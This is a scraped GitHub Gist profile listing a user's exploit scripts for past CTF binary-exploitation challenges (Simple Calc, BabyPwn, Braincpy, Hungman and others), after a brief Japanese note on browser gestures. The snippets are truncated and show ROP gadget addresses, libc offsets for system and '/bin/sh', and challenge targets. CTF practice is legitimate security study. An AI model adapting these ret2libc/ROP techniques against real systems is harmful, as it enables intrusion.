Skip to content

Instantly share code, notes, and snippets.

View tsunpoko's full-sized avatar

tsun tsunpoko

  • Yahoo Japan
  • Japan
View GitHub Profile
# ジェスチャ
jikichi ニキ発表
ジェスチャは便利だが、もともと存在しているジェスチャ + カスタマイズのジェスチャを作成する必要あり
2本指で出来るのは vivaldi 関係ないジェスチャ
「option キーと合わせてジェスチャを実行する」を有効か
ページを戻る, ページを進む と競合
@tsunpoko
tsunpoko / exploit.py
Created March 6, 2017 06:44
[Boston Key Party CTF 2016] Simple Calc
from subprocess import *
p = Popen('./simple_calc', stdin=PIPE, stdout=PIPE)
addr_bss = 0x0000000006c2c40
rdi = 0x493fd6
rsi = 0x0048acea
rdx = 0x00437a85
rax = 0x004749d8
ptrrax_rdx_rbx = 0x0047efb8 #: mov qword [rax], rdx ; pop rbx ; ret ; (1 found)
@tsunpoko
tsunpoko / exploit.py
Last active February 12, 2017 21:43
CODEGATE2017 prequals - BabyPwn
from No___Op import *
if len(sys.argv) > 1:
target = '110.10.212.130:8889'
else:
target = 'localhost:8181'
c = Pwning( target )
@tsunpoko
tsunpoko / exploit.py
Created September 25, 2016 05:35
[CodeGate 2013] Vuln400
from No___Op import *
target = 'localhost:4444'
c = Pwning( target )
system = 0x8048630
free_wrapper = 0x80487c4
time.sleep(30)
@tsunpoko
tsunpoko / exploit.py
Created September 23, 2016 07:01
[hack.lu2012] #09 Braincpy - 300
from No___Op import *
from subprocess import *
bss = 0x80e5060 + 0x400
mprotect = 0x805a5a0
stdin = 0x80e5080
fread = 0x80a94c0
pop4ret = 0x80489db
pop3ret = pop4ret + 1
leave_ret = 0x80c207e
@tsunpoko
tsunpoko / exploit.py
Created September 22, 2016 03:24
31c3 ctf - cfy
from No___Op import *
target = 'localhost:4444'
c = Pwning( target )
offset = {
'__libc_start_main': 0x21e50,
'system': 0x46590,
'/bin/sh': 0x17c8c3, # str
@tsunpoko
tsunpoko / exploit.py
Created September 21, 2016 14:34
[codegate 2016] oldschool pwn490
from No___Op import *
target = 'localhost:4444'
c = Pwning( target )
fini_array = 0x080496dc
main = 0x0804849b
offset = {
@tsunpoko
tsunpoko / exploit.py
Created September 21, 2016 13:54
[CSAW CTF 2016] Hungman
from No___Op import *
target = 'localhost:11111'
offset = {
'__libc_start_main': 0x21e50,
'system': 0x46590,
'/bin/sh': 0x17c8c3, # str
'scanf' : 0x00000000005dd10
}
@tsunpoko
tsunpoko / exploit.py
Last active September 20, 2016 11:25
[TWMMA CTF 2016] Pwn greeting
from No___Op import *
if len(sys.argv) < 2:
target = "localhost:4444"
else:
target = "pwn2.chal.ctf.westerns.tokyo:16317"
plt = {
'system': 0x08048490
@tsunpoko
tsunpoko / exploit.py
Created September 16, 2016 07:52
[SECUINSIDE 2013] pwn me!! - 750
from No___Op import *
offset = {
'__libc_start_main': 0x19a00,
'system': 0x40310,
'/bin/sh': 0x16084c, # str
}
target = 'localhost:8181'